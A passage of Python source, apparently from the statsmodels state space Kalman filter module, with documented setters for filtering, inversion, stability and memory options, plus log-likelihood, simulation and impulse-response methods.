Examples
--------
>>> mod = sm.tsa.statespace.SARIMAX(range(10))
>>> mod.ssm.filter_method
1
>>> mod.ssm.filter_conventional
True
>>> mod.ssm.filter_univariate = True
>>> mod.ssm.filter_method
17
>>> mod.ssm.set_filter_method(filter_univariate=False,
... filter_collapsed=True)
>>> mod.ssm.filter_method
33
>>> mod.ssm.set_filter_method(filter_method=1)
>>> mod.ssm.filter_conventional
True
>>> mod.ssm.filter_univariate
False
>>> mod.ssm.filter_collapsed
False
>>> mod.ssm.filter_univariate = True
>>> mod.ssm.filter_method
17
"""
if filter_method is not None:
self.filter_method = filter_method
for name in KalmanFilter.filter_methods:
if name in kwargs:
setattr(self, name, kwargs[name])
def set_inversion_method(self, inversion_method=None, **kwargs):
r"""
Set the inversion method
The Kalman filter may contain one matrix inversion: that of the
forecast error covariance matrix. The inversion method controls how and
if that inverse is performed.
Parameters
----------
inversion_method : int, optional
Bitmask value to set the inversion method to. See notes for
details.
**kwargs
Keyword arguments may be used to influence the inversion method by
setting individual boolean flags. See notes for details.
Notes
-----
The inversion method is defined by a collection of boolean flags, and
is internally stored as a bitmask. The methods available are:
INVERT_UNIVARIATE
If the endogenous time series is univariate, then inversion can be
performed by simple division. If this flag is set and the time
series is univariate, then division will always be used even if
other flags are also set.
SOLVE_LU
Use an LU decomposition along with a linear solver (rather than
ever actually inverting the matrix).
INVERT_LU
Use an LU decomposition along with typical matrix inversion.
SOLVE_CHOLESKY
Use a Cholesky decomposition along with a linear solver.
INVERT_CHOLESKY
Use a Cholesky decomposition along with typical matrix inversion.
If the bitmask is set directly via the `inversion_method` argument,
then the full method must be provided.
If keyword arguments are used to set individual boolean flags, then
the lowercase of the method must be used as an argument name, and the
value is the desired value of the boolean flag (True or False).
Note that the inversion method may also be specified by directly
modifying the class attributes which are defined similarly to the
keyword arguments.
The default inversion method is `INVERT_UNIVARIATE | SOLVE_CHOLESKY`.
Several things to keep in mind are:
- If the filtering method is specified to be univariate, then simple
division is always used regardless of the dimension of the endogenous
time series.
- Cholesky decomposition is about twice as fast as LU decomposition,
but it requires that the matrix be positive definite. While this
should generally be true, it may not be in every case.
- Using a linear solver rather than true matrix inversion is generally
faster and is numerically more stable.
Examples
--------
>>> mod = sm.tsa.statespace.SARIMAX(range(10))
>>> mod.ssm.inversion_method
9
>>> mod.ssm.solve_cholesky
True
>>> mod.ssm.invert_univariate
True
>>> mod.ssm.invert_lu
False
>>> mod.ssm.invert_univariate = False
>>> mod.ssm.inversion_method
8
>>> mod.ssm.set_inversion_method(solve_cholesky=False,
... invert_cholesky=True)
>>> mod.ssm.inversion_method
16
"""
if inversion_method is not None:
self.inversion_method = inversion_method
for name in KalmanFilter.inversion_methods:
if name in kwargs:
setattr(self, name, kwargs[name])
def set_stability_method(self, stability_method=None, **kwargs):
r"""
Set the numerical stability method
The Kalman filter is a recursive algorithm that may in some cases
suffer issues with numerical stability. The stability method controls
what, if any, measures are taken to promote stability.
Parameters
----------
stability_method : int, optional
Bitmask value to set the stability method to. See notes for
details.
**kwargs
Keyword arguments may be used to influence the stability method by
setting individual boolean flags. See notes for details.
Notes
-----
The stability method is defined by a collection of boolean flags, and
is internally stored as a bitmask. The methods available are:
STABILITY_FORCE_SYMMETRY = 0x01
If this flag is set, symmetry of the predicted state covariance
matrix is enforced at each iteration of the filter, where each
element is set to the average of the corresponding elements in the
upper and lower triangle.
If the bitmask is set directly via the `stability_method` argument,
then the full method must be provided.
If keyword arguments are used to set individual boolean flags, then
the lowercase of the method must be used as an argument name, and the
value is the desired value of the boolean flag (True or False).
Note that the stability method may also be specified by directly
modifying the class attributes which are defined similarly to the
keyword arguments.
The default stability method is `STABILITY_FORCE_SYMMETRY`.
Examples
--------
>>> mod = sm.tsa.statespace.SARIMAX(range(10))
>>> mod.ssm.stability_method
1
>>> mod.ssm.stability_force_symmetry
True
>>> mod.ssm.stability_force_symmetry = False
>>> mod.ssm.stability_method
0
"""
if stability_method is not None:
self.stability_method = stability_method
for name in KalmanFilter.stability_methods:
if name in kwargs:
setattr(self, name, kwargs[name])
def set_conserve_memory(self, conserve_memory=None, **kwargs):
r"""
Set the memory conservation method
By default, the Kalman filter computes a number of intermediate
matrices at each iteration. The memory conservation options control
which of those matrices are stored.
Parameters
----------
conserve_memory : int, optional
Bitmask value to set the memory conservation method to. See notes
for details.
**kwargs
Keyword arguments may be used to influence the memory conservation
method by setting individual boolean flags. See notes for details.
Notes
-----
The memory conservation method is defined by a collection of boolean
flags, and is internally stored as a bitmask. The methods available
are:
MEMORY_STORE_ALL
Store all intermediate matrices. This is the default value.
MEMORY_NO_FORECAST_MEAN
Do not store the forecast or forecast errors. If this option is
used, the `predict` method from the results class is unavailable.
MEMORY_NO_FORECAST_COV
Do not store the forecast error covariance matrices.
MEMORY_NO_FORECAST
Do not store the forecast, forecast error, or forecast error
covariance matrices. If this option is used, the `predict` method
from the results class is unavailable.
MEMORY_NO_PREDICTED_MEAN
Do not store the predicted state.
MEMORY_NO_PREDICTED_COV
Do not store the predicted state covariance
matrices.
MEMORY_NO_PREDICTED
Do not store the predicted state or predicted state covariance
matrices.
MEMORY_NO_FILTERED_MEAN
Do not store the filtered state.
MEMORY_NO_FILTERED_COV
Do not store the filtered state covariance
matrices.
MEMORY_NO_FILTERED
Do not store the filtered state or filtered state covariance
matrices.
MEMORY_NO_LIKELIHOOD
Do not store the vector of loglikelihood values for each
observation. Only the sum of the loglikelihood values is stored.
MEMORY_NO_GAIN
Do not store the Kalman gain matrices.
MEMORY_NO_SMOOTHING
Do not store temporary variables related to Kalman smoothing. If
this option is used, smoothing is unavailable.
MEMORY_NO_STD_FORECAST
Do not store standardized forecast errors.
MEMORY_CONSERVE
Do not store any intermediate matrices.
If the bitmask is set directly via the `conserve_memory` argument,
then the full method must be provided.
If keyword arguments are used to set individual boolean flags, then
the lowercase of the method must be used as an argument name, and the
value is the desired value of the boolean flag (True or False).
Note that the memory conservation method may also be specified by
directly modifying the class attributes which are defined similarly to
the keyword arguments.
The default memory conservation method is `MEMORY_STORE_ALL`, so that
all intermediate matrices are stored.
Examples
--------
>>> mod = sm.tsa.statespace.SARIMAX(range(10))
>>> mod.ssm.conserve_memory
0
>>> mod.ssm.memory_no_predicted
False
>>> mod.ssm.memory_no_predicted = True
>>> mod.ssm.conserve_memory
2
>>> mod.ssm.set_conserve_memory(memory_no_filtered=True,
... memory_no_forecast=True)
>>> mod.ssm.conserve_memory
7
"""
if conserve_memory is not None:
self.conserve_memory = conserve_memory
for name in KalmanFilter.memory_options:
if name in kwargs:
setattr(self, name, kwargs[name])
def set_filter_timing(self, alternate_timing=None, **kwargs):
r"""
Set the filter timing convention
By default, the Kalman filter follows Durbin and Koopman, 2012, in
initializing the filter with predicted values. Kim and Nelson, 1999,
instead initialize the filter with filtered values, which is
essentially just a different timing convention.
Parameters
----------
alternate_timing : bool, optional
Whether or not to use the alternate timing convention. Default is
unspecified.
**kwargs
Keyword arguments may be used to influence the filter timing
convention by setting the individual boolean flags
`timing_init_predicted` or `timing_init_filtered`.
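Examples
--------
A minimal sketch; the flag values shown assume the usual convention
that TIMING_INIT_PREDICTED = 0x00 and TIMING_INIT_FILTERED = 0x01:
>>> mod = sm.tsa.statespace.SARIMAX(range(10))
>>> mod.ssm.filter_timing
0
>>> mod.ssm.set_filter_timing(timing_init_filtered=True)
>>> mod.ssm.filter_timing
1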
"""
if alternate_timing is not None:
self.filter_timing = int(alternate_timing)
if 'timing_init_predicted' in kwargs:
self.filter_timing = int(not kwargs['timing_init_predicted'])
if 'timing_init_filtered' in kwargs:
self.filter_timing = int(kwargs['timing_init_filtered'])
@contextlib.contextmanager
def fixed_scale(self, scale):
"""
fixed_scale(scale)
Context manager for fixing the scale when FILTER_CONCENTRATED is set
Parameters
----------
scale : numeric
Scale of the model.
Notes
-----
This is a no-op if scale is None.
This context manager is most useful in models which are explicitly
concentrating out the scale, so that the set of parameters they are
estimating does not include the scale.
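Examples
--------
A sketch of typical usage; the scale value 1.2 is purely illustrative,
and the model must already use the concentrated log-likelihood:
>>> mod.ssm.filter_concentrated = True
>>> with mod.ssm.fixed_scale(1.2):
...     res = mod.ssm.filter()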
"""
# If a scale was provided, use it and do not concentrate it out of the
# loglikelihood
if scale is not None and scale != 1:
if not self.filter_concentrated:
raise ValueError('Cannot provide scale if filter method does'
' not include FILTER_CONCENTRATED.')
self.filter_concentrated = False
self._scale = scale
obs_cov = self['obs_cov']
state_cov = self['state_cov']
self['obs_cov'] = scale * obs_cov
self['state_cov'] = scale * state_cov
try:
yield
finally:
# If a scale was provided, reset the model
if scale is not None and scale != 1:
self['state_cov'] = state_cov
self['obs_cov'] = obs_cov
self.filter_concentrated = True
self._scale = None
def _filter(self, filter_method=None, inversion_method=None,
stability_method=None, conserve_memory=None,
filter_timing=None, tolerance=None, loglikelihood_burn=None,
complex_step=False):
# Initialize the filter
prefix, dtype, create_filter, create_statespace = (
self._initialize_filter(
filter_method, inversion_method, stability_method,
conserve_memory, filter_timing, tolerance, loglikelihood_burn
)
)
kfilter = self._kalman_filters[prefix]
# Initialize the state
self._initialize_state(prefix=prefix, complex_step=complex_step)
# Run the filter
kfilter()
return kfilter
def filter(self, filter_method=None, inversion_method=None,
stability_method=None, conserve_memory=None, filter_timing=None,
tolerance=None, loglikelihood_burn=None, complex_step=False):
r"""
Apply the Kalman filter to the statespace model.
Parameters
----------
filter_method : int, optional
Determines which Kalman filter to use. Default is conventional.
inversion_method : int, optional
Determines which inversion technique to use. Default is by Cholesky
decomposition.
stability_method : int, optional
Determines which numerical stability techniques to use. Default is
to enforce symmetry of the predicted state covariance matrix.
conserve_memory : int, optional
Determines what output from the filter to store. Default is to
store everything.
filter_timing : int, optional
Determines the timing convention of the filter. Default is that
from Durbin and Koopman (2012), in which the filter is initialized
with predicted values.
tolerance : float, optional
The tolerance at which the Kalman filter determines convergence to
steady-state. Default is 1e-19.
loglikelihood_burn : int, optional
The number of initial periods during which the loglikelihood is not
recorded. Default is 0.
Notes
-----
This function by default does not compute variables required for
smoothing.
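Examples
--------
A sketch, assuming `mod.ssm` has data bound and its system matrices
set; the result is an instance of `results_class` (by default,
FilterResults):
>>> res = mod.ssm.filter()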
"""
# Handle memory conservation
if conserve_memory is None:
conserve_memory = self.conserve_memory | MEMORY_NO_SMOOTHING
conserve_memory_cache = self.conserve_memory
self.set_conserve_memory(conserve_memory)
# Run the filter
kfilter = self._filter(
filter_method, inversion_method, stability_method, conserve_memory,
filter_timing, tolerance, loglikelihood_burn, complex_step)
# Create the results object
results = self.results_class(self)
results.update_representation(self)
results.update_filter(kfilter)
# Reset memory conservation
self.set_conserve_memory(conserve_memory_cache)
return results
def loglike(self, **kwargs):
r"""
Calculate the loglikelihood associated with the statespace model.
Parameters
----------
**kwargs
Additional keyword arguments to pass to the Kalman filter. See
`KalmanFilter.filter` for more details.
Returns
-------
loglike : float
The joint loglikelihood.
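Examples
--------
A sketch, assuming `mod.ssm` has data bound and its system matrices
set; the value depends entirely on the model and data:
>>> llf = mod.ssm.loglike()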
"""
kwargs.setdefault('conserve_memory',
MEMORY_CONSERVE ^ MEMORY_NO_LIKELIHOOD)
kfilter = self._filter(**kwargs)
loglikelihood_burn = kwargs.get('loglikelihood_burn',
self.loglikelihood_burn)
if not (kwargs['conserve_memory'] & MEMORY_NO_LIKELIHOOD):
loglike = np.sum(kfilter.loglikelihood[loglikelihood_burn:])
else:
loglike = np.sum(kfilter.loglikelihood)
# Need to modify the computed log-likelihood to incorporate the
# MLE scale.
if self.filter_method & FILTER_CONCENTRATED:
d = max(loglikelihood_burn, kfilter.nobs_diffuse)
nobs_k_endog = np.sum(
self.k_endog -
np.array(self._statespace.nmissing)[d:])
# In the univariate case, we need to subtract observations
# associated with a singular forecast error covariance matrix
nobs_k_endog -= kfilter.nobs_kendog_univariate_singular
if not (kwargs['conserve_memory'] & MEMORY_NO_LIKELIHOOD):
scale = np.sum(kfilter.scale[d:]) / nobs_k_endog
else:
scale = kfilter.scale[0] / nobs_k_endog
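# Since the concentrated scale is defined by
# scale = sum(v' F^{-1} v) / nobs_k_endog, the quadratic term
# -0.5 * sum(v' F^{-1} v) / scale reduces to -0.5 * nobs_k_endog below.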
loglike += -0.5 * nobs_k_endog
# Now need to modify this for diffuse initialization, since for
# diffuse periods we only need to add in the scale value part if
# the diffuse forecast error covariance matrix element was singular
if kfilter.nobs_diffuse > 0:
nobs_k_endog -= kfilter.nobs_kendog_diffuse_nonsingular
loglike += -0.5 * nobs_k_endog * np.log(scale)
return loglike
def loglikeobs(self, **kwargs):
r"""
Calculate the loglikelihood for each observation associated with the
statespace model.
Parameters
----------
**kwargs
Additional keyword arguments to pass to the Kalman filter. See
`KalmanFilter.filter` for more details.
Notes
-----
If `loglikelihood_burn` is positive, then the entries in the returned
loglikelihood vector are set to be zero for those initial time periods.
Returns
-------
loglike : array of float
Array of loglikelihood values for each observation.
"""
if self.memory_no_likelihood:
raise RuntimeError('Cannot compute loglikelihood if'
' MEMORY_NO_LIKELIHOOD option is selected.')
if not self.filter_method & FILTER_CONCENTRATED:
kwargs.setdefault('conserve_memory',
MEMORY_CONSERVE ^ MEMORY_NO_LIKELIHOOD)
else:
kwargs.setdefault(
'conserve_memory',
MEMORY_CONSERVE ^ (MEMORY_NO_FORECAST | MEMORY_NO_LIKELIHOOD))
kfilter = self._filter(**kwargs)
llf_obs = np.array(kfilter.loglikelihood, copy=True)
loglikelihood_burn = kwargs.get('loglikelihood_burn',
self.loglikelihood_burn)
# If the scale was concentrated out of the log-likelihood function,
# then the llf_obs above is:
# -0.5 * k_endog * log(2 * pi) - 0.5 * log|F_t|
# and we need to add in the effect of the scale:
# -0.5 * k_endog * log(scale) - 0.5 * v' F_t^{-1} v / scale
# and note that v' F_t^{-1} v is in the _kalman_filter.scale array
# Also note that we need to adjust the nobs and k_endog in both the
# denominator of the scale computation and in the llf_obs adjustment
# to take into account missing values.
if self.filter_method & FILTER_CONCENTRATED:
d = max(loglikelihood_burn, kfilter.nobs_diffuse)
nmissing = np.array(self._statespace.nmissing)
nobs_k_endog = np.sum(self.k_endog - nmissing[d:])
# In the univariate case, we need to subtract observations
# associated with a singular forecast error covariance matrix
nobs_k_endog -= kfilter.nobs_kendog_univariate_singular
scale = np.sum(kfilter.scale[d:]) / nobs_k_endog
# Need to modify this for diffuse initialization, since for
# diffuse periods we only need to add in the scale value if the
# diffuse forecast error covariance matrix element was singular
nsingular = 0
if kfilter.nobs_diffuse > 0:
d = kfilter.nobs_diffuse
Finf = kfilter.forecast_error_diffuse_cov
singular = np.diagonal(Finf).real <= kfilter.tolerance_diffuse
nsingular = np.sum(~singular, axis=1)
scale_obs = np.array(kfilter.scale, copy=True)
llf_obs += -0.5 * (
(self.k_endog - nmissing - nsingular) * np.log(scale) +
scale_obs / scale)
# Set any burned observations to have zero likelihood
llf_obs[:loglikelihood_burn] = 0
return llf_obs
def simulate(self, nsimulations, measurement_shocks=None,
state_shocks=None, initial_state=None):
r"""
Simulate a new time series following the state space model
Parameters
----------
nsimulations : int
The number of observations to simulate. If the model is
time-invariant this can be any number. If the model is
time-varying, then this number must be less than or equal to the
number of observations.
measurement_shocks : array_like, optional
If specified, these are the shocks to the measurement equation,
:math:`\varepsilon_t`. If unspecified, these are automatically
generated using a pseudo-random number generator. If specified,
must be shaped `nsimulations` x `k_endog`, where `k_endog` is the
same as in the state space model.
state_shocks : array_like, optional
If specified, these are the shocks to the state equation,
:math:`\eta_t`. If unspecified, these are automatically
generated using a pseudo-random number generator. If specified,
must be shaped `nsimulations` x `k_posdef` where `k_posdef` is the
same as in the state space model.
initial_state : array_like, optional
If specified, this is the state vector at time zero, which should
be shaped (`k_states` x 1), where `k_states` is the same as in the
state space model. If unspecified, but the model has been
initialized, then that initialization is used. If unspecified and
the model has not been initialized, then a vector of zeros is used.
Note that this is not included in the returned `simulated_states`
array.
Returns
-------
simulated_obs : ndarray
An (nsimulations x k_endog) array of simulated observations.
simulated_states : ndarray
An (nsimulations x k_states) array of simulated states.
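Examples
--------
A sketch for a univariate, time-invariant model, assuming a subclass
that implements `_simulate` (e.g. via the simulation smoother):
>>> sim_obs, sim_states = mod.ssm.simulate(100)
>>> sim_obs.shape
(100, 1)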
"""
time_invariant = self.time_invariant
# Check for valid number of simulations
if not time_invariant and nsimulations > self.nobs:
raise ValueError('In a time-varying model, cannot create more'
' simulations than there are observations.')
# Check / generate measurement shocks
if measurement_shocks is not None:
measurement_shocks = np.array(measurement_shocks)
if measurement_shocks.ndim == 0:
measurement_shocks = measurement_shocks[np.newaxis, np.newaxis]
elif measurement_shocks.ndim == 1:
measurement_shocks = measurement_shocks[:, np.newaxis]
required_shape = (nsimulations, self.k_endog)
try:
measurement_shocks = measurement_shocks.reshape(required_shape)
except ValueError:
raise ValueError('Provided measurement shocks are not of the'
' appropriate shape. Required %s, got %s.'
% (str(required_shape),
str(measurement_shocks.shape)))
elif self.shapes['obs_cov'][-1] == 1:
measurement_shocks = np.random.multivariate_normal(
mean=np.zeros(self.k_endog), cov=self['obs_cov'],
size=nsimulations)
# Check / generate state shocks
if state_shocks is not None:
state_shocks = np.array(state_shocks)
if state_shocks.ndim == 0:
state_shocks = state_shocks[np.newaxis, np.newaxis]
elif state_shocks.ndim == 1:
state_shocks = state_shocks[:, np.newaxis]
required_shape = (nsimulations, self.k_posdef)
try:
state_shocks = state_shocks.reshape(required_shape)
except ValueError:
raise ValueError('Provided state shocks are not of the'
' appropriate shape. Required %s, got %s.'
% (str(required_shape),
str(state_shocks.shape)))
elif self.shapes['state_cov'][-1] == 1:
state_shocks = np.random.multivariate_normal(
mean=np.zeros(self.k_posdef), cov=self['state_cov'],
size=nsimulations)
# Handle time-varying case
tvp = (self.shapes['obs_cov'][-1] > 1 or
self.shapes['state_cov'][-1] > 1)
if tvp and measurement_shocks is None:
measurement_shocks = np.zeros((nsimulations, self.k_endog))
for i in range(nsimulations):
measurement_shocks[i] = np.random.multivariate_normal(
mean=np.zeros(self.k_endog),
cov=self['obs_cov', ..., i])
if tvp and state_shocks is None:
state_shocks = np.zeros((nsimulations, self.k_posdef))
for i in range(nsimulations):
state_shocks[i] = np.random.multivariate_normal(
mean=np.zeros(self.k_posdef),
cov=self['state_cov', ..., i])
# Get the initial states
if initial_state is not None:
initial_state = np.array(initial_state)
if initial_state.ndim == 0:
initial_state = initial_state[np.newaxis]
elif (initial_state.ndim > 1 and
not initial_state.shape == (self.k_states, 1)):
raise ValueError('Invalid shape of provided initial state'
' vector. Required (%d, 1)' % self.k_states)
elif self.initialization is not None:
out = self.initialization(model=self)
initial_state = out[0] + np.random.multivariate_normal(
np.zeros_like(out[0]), out[2])
else:
# TODO: deprecate this, since we really should not be simulating
# unless we have an initialization.
initial_state = np.zeros(self.k_states)
return self._simulate(nsimulations, measurement_shocks, state_shocks,
initial_state)
def _simulate(self, nsimulations, measurement_shocks, state_shocks,
initial_state):
raise NotImplementedError('Simulation only available through'
' the simulation smoother.')
def impulse_responses(self, steps=10, impulse=0, orthogonalized=False,
cumulative=False, direct=False):
r"""
Impulse response function
Parameters
----------
steps : int, optional
The number of steps for which impulse responses are calculated.
Default is 10. Note that the initial impulse is not counted as a
step, so if `steps=1`, the output will have 2 entries.
impulse : int or array_like
If an integer, the state innovation to pulse; must be between 0
and `k_posdef-1` where `k_posdef` is the same as in the state
space model. Alternatively, a custom impulse vector may be
provided; must be a column vector with shape `(k_posdef, 1)`.
orthogonalized : bool, optional
Whether or not to perform impulse using orthogonalized innovations.
Note that this will also affect custom `impulse` vectors. Default
is False.
cumulative : bool, optional
Whether or not to return cumulative impulse responses. Default is
False.
Returns
-------
impulse_responses : ndarray
Responses for each endogenous variable due to the impulse
given by the `impulse` argument. A (steps + 1 x k_endog) array.
Notes
-----
Intercepts in the measurement and state equation are ignored when
calculating impulse responses.
TODO: add note about how for time-varying systems this is - perhaps
counter-intuitively - returning the impulse response within the given
model (i.e. starting at period 0 defined by the model) and it is *not*
doing impulse responses after the end of the model. To compute impulse
responses from arbitrary time points, it is necessary to clone a new
model with the appropriate system matrices.
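Examples
--------
A sketch for a univariate, time-invariant model; the extra row in the
output is the initial impulse itself:
>>> irf = mod.ssm.impulse_responses(steps=10, impulse=0)
>>> irf.shape
(11, 1)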
"""
# We need to add an additional step, since the first simulated value
# will always be zeros (note that we take this value out at the end).
steps += 1
# For time-invariant models, add an additional `step`. This is the
# default for time-invariant models based on the expected behavior for
# ARIMA and VAR models: we want to record the initial impulse and also
# `steps` values of the responses afterwards.
if (self._design.shape[2] == 1 and self._transition.shape[2] == 1 and
self._selection.shape[2] == 1):
steps += 1
# Check for what kind of impulse we want
if type(impulse) == int:
if impulse >= self.k_posdef or impulse < 0:
raise ValueError('Invalid value for `impulse`. Must be the'
' index of one of the state innovations.')
# Create the (non-orthogonalized) impulse vector
idx = impulse
impulse = np.zeros(self.k_posdef)
impulse[idx] = 1
else:
impulse = np.array(impulse)
if impulse.ndim > 1:
impulse = np.squeeze(impulse)
if not impulse.shape == (self.k_posdef,):
raise ValueError('Invalid impulse vector. Must be shaped'
' (%d,)' % self.k_posdef)
# Orthogonalize the impulses, if requested, using Cholesky on the
# first state covariance matrix
if orthogonalized:
state_chol = np.linalg.cholesky(self.state_cov[:, :, 0])
impulse = np.dot(state_chol, impulse)
# If we have time-varying design, transition, or selection matrices,
# then we can't produce more IRFs than we have time points
time_invariant_irf = (
self._design.shape[2] == self._transition.shape[2] ==
self._selection.shape[2] == 1)
# Note: to generate impulse responses following the end of a
# time-varying model, one should `clone` the state space model with the
# new time-varying model, and then compute the IRFs using the cloned
# model
if not time_invariant_irf and steps > self.nobs:
raise ValueError('In a time-varying model, cannot create more'
' impulse responses than there are'
' observations')
# Impulse responses only depend on the design, transition, and
# selection matrices. We set the others to zeros because they must be
# set in the call to `clone`.
# Note: we don't even need selection after the first point, because
# the state shocks will be zeros in every period except the first.
sim_model = self.clone(
endog=np.zeros((steps, self.k_endog), dtype=self.dtype),
obs_intercept=np.zeros(self.k_endog),
design=self['design', :, :, :steps],
obs_cov=np.zeros((self.k_endog, self.k_endog)),
state_intercept=np.zeros(self.k_states),
transition=self['transition', :, :, :steps],
selection=self['selection', :, :, :steps],
state_cov=np.zeros((self.k_posdef, self.k_posdef)))
# Get the impulse response function via simulation of the state
# space model, but with other shocks set to zero
measurement_shocks = np.zeros((steps, self.k_endog))
state_shocks = np.zeros((steps, self.k_posdef))
state_shocks[0] = impulse
initial_state = np.zeros((self.k_states,))
irf, _ = sim_model.simulate(
steps, measurement_shocks=measurement_shocks,
state_shocks=state_shocks, initial_state=initial_state)
# Get the cumulative response if requested
if cumulative:
irf = np.cumsum(irf, axis=0)
# Here we ignore the first value, because it is always zeros (we added
# an additional `step` at the top to account for this).
return irf[1:]
class FilterResults(FrozenRepresentation):
"""
Results from applying the Kalman filter to a state space model.
Parameters
----------
model : Representation
A Statespace representation
Attributes
----------
nobs : int
Number of observations.
nobs_diffuse : int
Number of observations under the diffuse Kalman filter.
k_endog : int
The dimension of the observation series.
k_states : int
The dimension of the unobserved state process.
k_posdef : int
The dimension of a guaranteed positive definite
covariance matrix describing the shocks in the
transition equation.
dtype : dtype
Datatype of representation matrices
prefix : str
BLAS prefix of representation matrices
shapes : dictionary of name,tuple
A dictionary recording the shapes of each of the
representation matrices as tuples.
endog : ndarray
The observation vector.
design : ndarray
The design matrix, :math:`Z`.
obs_intercept : ndarray
The intercept for the observation equation, :math:`d`.
obs_cov : ndarray
The covariance matrix for the observation equation :math:`H`.
transition : ndarray
The transition matrix, :math:`T`.
state_intercept : ndarray
The intercept for the transition equation, :math:`c`.
selection : ndarray
The selection matrix, :math:`R`.
state_cov : ndarray
The covariance matrix for the state equation :math:`Q`.
missing : array of bool
An array of the same size as `endog`, filled
with boolean values that are True if the
corresponding entry in `endog` is NaN and False
otherwise.
nmissing : array of int
An array of size `nobs`, where the ith entry
is the number (between 0 and `k_endog`) of NaNs in
the ith row of the `endog` array.
time_invariant : bool
Whether or not the representation matrices are time-invariant
initialization : str
Kalman filter initialization method.
initial_state : array_like
The state vector used to initialize the Kalman filter.
initial_state_cov : array_like
The state covariance matrix used to initialize the Kalman filter.
initial_diffuse_state_cov : array_like
Diffuse state covariance matrix used to initialize the Kalman filter.
filter_method : int
Bitmask representing the Kalman filtering method
inversion_method : int
Bitmask representing the method used to
invert the forecast error covariance matrix.
stability_method : int
Bitmask representing the methods used to promote
numerical stability in the Kalman filter
recursions.
conserve_memory : int
Bitmask representing the selected memory conservation method.
filter_timing : int
Whether or not to use the alternate timing convention.
tolerance : float
The tolerance at which the Kalman filter
determines convergence to steady-state.
loglikelihood_burn : int
The number of initial periods during which
the loglikelihood is not recorded.
converged : bool
Whether or not the Kalman filter converged.
period_converged : int
The time period in which the Kalman filter converged.
filtered_state : ndarray
The filtered state vector at each time period.
filtered_state_cov : ndarray
The filtered state covariance matrix at each time period.
predicted_state : ndarray
The predicted state vector at each time period.
predicted_state_cov : ndarray
The predicted state covariance matrix at each time period.
forecast_error_diffuse_cov : ndarray
Diffuse forecast error covariance matrix at each time period.
predicted_diffuse_state_cov : ndarray
The predicted diffuse state covariance matrix at each time period.
kalman_gain : ndarray
The Kalman gain at each time period.
forecasts : ndarray
The one-step-ahead forecasts of observations at each time period.
forecasts_error : ndarray
The forecast errors at each time period.
forecasts_error_cov : ndarray
The forecast error covariance matrices at each time period.
llf_obs : ndarray
The loglikelihood values at each time period.
"""
_filter_attributes = [
'filter_method', 'inversion_method', 'stability_method',
'conserve_memory', 'filter_timing', 'tolerance', 'loglikelihood_burn',
'converged', 'period_converged', 'filtered_state',
'filtered_state_cov', 'predicted_state', 'predicted_state_cov',
'forecasts_error_diffuse_cov', 'predicted_diffuse_state_cov',
'tmp1', 'tmp2', 'tmp3', 'tmp4', 'forecasts',
'forecasts_error', 'forecasts_error_cov', 'llf', 'llf_obs',
'collapsed_forecasts', 'collapsed_forecasts_error',
'collapsed_forecasts_error_cov', 'scale'
]
_filter_options = (
KalmanFilter.filter_methods + KalmanFilter.stability_methods +
KalmanFilter.inversion_methods + KalmanFilter.memory_options
)
_attributes = FrozenRepresentation._model_attributes + _filter_attributes
def __init__(self, model):
super(FilterResults, self).__init__(model)
# Setup caches for uninitialized objects
self._kalman_gain = None
self._standardized_forecasts_error = None
def update_representation(self, model, only_options=False):
"""
Update the results to match a given model
Parameters
----------
model : Representation
The model object from which to take the updated values.
only_options : bool, optional
If set to true, only the filter options are updated, and the state
space representation is not updated. Default is False.
Notes
-----
This method is rarely required except for internal usage.
"""
if not only_options:
super(FilterResults, self).update_representation(model)
# Save the options as boolean variables
for name in self._filter_options:
setattr(self, name, getattr(model, name, None))
def update_filter(self, kalman_filter):
"""
Update the filter results
Parameters
----------
kalman_filter : statespace.kalman_filter.KalmanFilter
The model object from which to take the updated values.
Notes
-----
This method is rarely required except for internal usage.
"""
# State initialization
self.initial_state = np.array(
kalman_filter.model.initial_state, copy=True
)
self.initial_state_cov = np.array(
kalman_filter.model.initial_state_cov, copy=True
)
# Save Kalman filter parameters
self.filter_method = kalman_filter.filter_method
self.inversion_method = kalman_filter.inversion_method
self.stability_method = kalman_filter.stability_method
self.conserve_memory = kalman_filter.conserve_memory
self.filter_timing = kalman_filter.filter_timing
self.tolerance = kalman_filter.tolerance
self.loglikelihood_burn = kalman_filter.loglikelihood_burn
# Save Kalman filter output
self.converged = bool(kalman_filter.converged)
self.period_converged = kalman_filter.period_converged
self.filtered_state = np.array(kalman_filter.filtered_state, copy=True)
self.filtered_state_cov = np.array(
kalman_filter.filtered_state_cov, copy=True
)
self.predicted_state = np.array(
kalman_filter.predicted_state, copy=True
)
self.predicted_state_cov = np.array(
kalman_filter.predicted_state_cov, copy=True
)
# Reset caches
has_missing = np.sum(self.nmissing) > 0
if not (self.memory_no_std_forecast or self.invert_lu or
self.solve_lu or self.filter_collapsed):
if has_missing:
self._standardized_forecasts_error = np.array(
reorder_missing_vector(
kalman_filter.standardized_forecast_error,
self.missing, prefix=self.prefix))
else:
self._standardized_forecasts_error = np.array(
kalman_filter.standardized_forecast_error, copy=True)
else:
self._standardized_forecasts_error = None
# In the partially missing data case, all entries will be in the
# upper left submatrix rather than in their correct placement.
# Re-ordering does not make sense in the collapsed case.
if has_missing and (not self.memory_no_gain and
not self.filter_collapsed):
self._kalman_gain = np.array(reorder_missing_matrix(
kalman_filter.kalman_gain, self.missing, reorder_cols=True,
prefix=self.prefix))
self.tmp1 = np.array(reorder_missing_matrix(
kalman_filter.tmp1, self.missing, reorder_cols=True,
prefix=self.prefix))
self.tmp2 = np.array(reorder_missing_vector(
kalman_filter.tmp2, self.missing, prefix=self.prefix))
self.tmp3 = np.array(reorder_missing_matrix(
kalman_filter.tmp3, self.missing, reorder_rows=True,
prefix=self.prefix))
self.tmp4 = np.array(reorder_missing_matrix(
kalman_filter.tmp4, self.missing, reorder_cols=True,
reorder_rows=True, prefix=self.prefix))
else:
if not self.memory_no_gain:
self._kalman_gain = np.array(
kalman_filter.kalman_gain, copy=True)
self.tmp1 = np.array(kalman_filter.tmp1, copy=True)
self.tmp2 = np.array(kalman_filter.tmp2, copy=True)
self.tmp3 = np.array(kalman_filter.tmp3, copy=True)
self.tmp4 = np.array(kalman_filter.tmp4, copy=True)
self.M = np.array(kalman_filter.M, copy=True)
self.M_diffuse = np.array(kalman_filter.M_inf, copy=True)
# Note: use forecasts rather than forecast, so as not to interfere
# with the `forecast` methods in subclasses
self.forecasts = np.array(kalman_filter.forecast, copy=True)
self.forecasts_error = np.array(
kalman_filter.forecast_error, copy=True
)
self.forecasts_error_cov = np.array(
kalman_filter.forecast_error_cov, copy=True
)
# Note: below we will set self.llf, and in the memory_no_likelihood
